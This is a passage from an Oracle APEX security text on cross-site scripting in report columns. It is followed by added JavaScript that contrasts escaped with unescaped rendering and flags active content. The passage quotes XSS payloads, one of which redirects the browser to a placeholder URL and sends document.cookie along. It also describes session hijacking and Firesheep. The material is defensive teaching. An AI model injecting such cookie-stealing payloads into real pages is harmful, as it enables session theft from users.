Figure 8-19. Javascript run in a SQL report
If there is any possibility of data containing unintended Javascript, the column display should be a type that will not run the script. Generally this is Display as Text (escape special characters, does not save state). APEX 4 greatly improved the wizards and page-building features to guard against cross-site scripting. In virtually all cases the APEX 4 wizards choose item and report column types that escape the data that is returned to the page. Developers still have the ability to change column types to send unescaped data to the browser or to send the unescaped content of an item.
Javascript has access to everything about the browser page that contains it, including cookies, which can be very dangerous. Given the URL of a page and the cookies associated with that page, it is easy to hijack a user's session. That is, if a hacker obtains the URL of a page you are currently viewing, and the cookies associated with that URL, the hacker can insert those cookies into his own browser, go to the URL, and essentially “become” you. The utility Firesheep operates on unencrypted wi-fi networks by sniffing cookies associated with Facebook and Twitter and inserting them into the Firesheep user's browser, allowing the user to become any Facebook or Twitter user on that unencrypted wi-fi network.
The following Javascript is far less dangerous. It will cause an alert with the cookie values:
<script>alert(document.cookie);</script>
The following Javascript, however, will redirect the browser to another URL, passing along the values of all of the cookies:
<script> window.location = 'http://someurl/' + document.cookie;</script>
While APEX does its best to keep us out of trouble, it is still possible to send unescaped content to the browser. Consider the regions shown in Figures 8-20 and 8-21. In most cases, the two regions have results, as shown in Figures 8-20 and 8-21.
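To make the column-type distinction above concrete, here is an added illustration (not code from the book or from APEX itself) that renders a small report twice: once as a plain column that sends the raw value to the browser, and once the way a Display as Text (escape special characters) column does. The report rows, the escapeHtml and renderReport functions, and the containsActiveContent check are all constructed for this example; the two cell values are the scripts quoted in the text.

```javascript
// Added example: an escaped report column versus an unescaped one.
// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Render one report cell. `escape` mirrors the column-type choice in the
// report attributes: true behaves like Display as Text (escape special
// characters), false like a column that sends the raw value to the browser.
function renderCell(value, escape) {
  return '<td>' + (escape ? escapeHtml(value) : value) + '</td>';
}

// Render a whole report region from an array of rows (arrays of column values).
function renderReport(rows, escape) {
  return '<table>' +
    rows.map(r => '<tr>' + r.map(v => renderCell(v, escape)).join('') + '</tr>').join('') +
    '</table>';
}

// A simple review check over rendered HTML: does a script tag, an inline
// event handler or a javascript: URL survive in the output? The renderer
// itself only ever writes table, tr and td tags, so any hit came from data.
function containsActiveContent(html) {
  return /<script\b|<\/script|\bon\w+\s*=|javascript:/i.test(html);
}

// Constructed sample rows: a harmless name plus the two scripts from the text.
const SAMPLE_ROWS = [
  [1, 'Ada Lovelace'],
  [2, '<script>alert(document.cookie);</script>'],
  [3, "<script> window.location = 'http://someurl/' + document.cookie;</script>"],
];

const unescaped = renderReport(SAMPLE_ROWS, false);
const escaped = renderReport(SAMPLE_ROWS, true);
console.log('raw column, active content present:     ', containsActiveContent(unescaped)); // true
console.log('escaped column, active content present: ', containsActiveContent(escaped));   // false
```

Running the same check against the HTML an APEX region actually emits (view source on the rendered page) is a quick way to confirm which column type a report is really using.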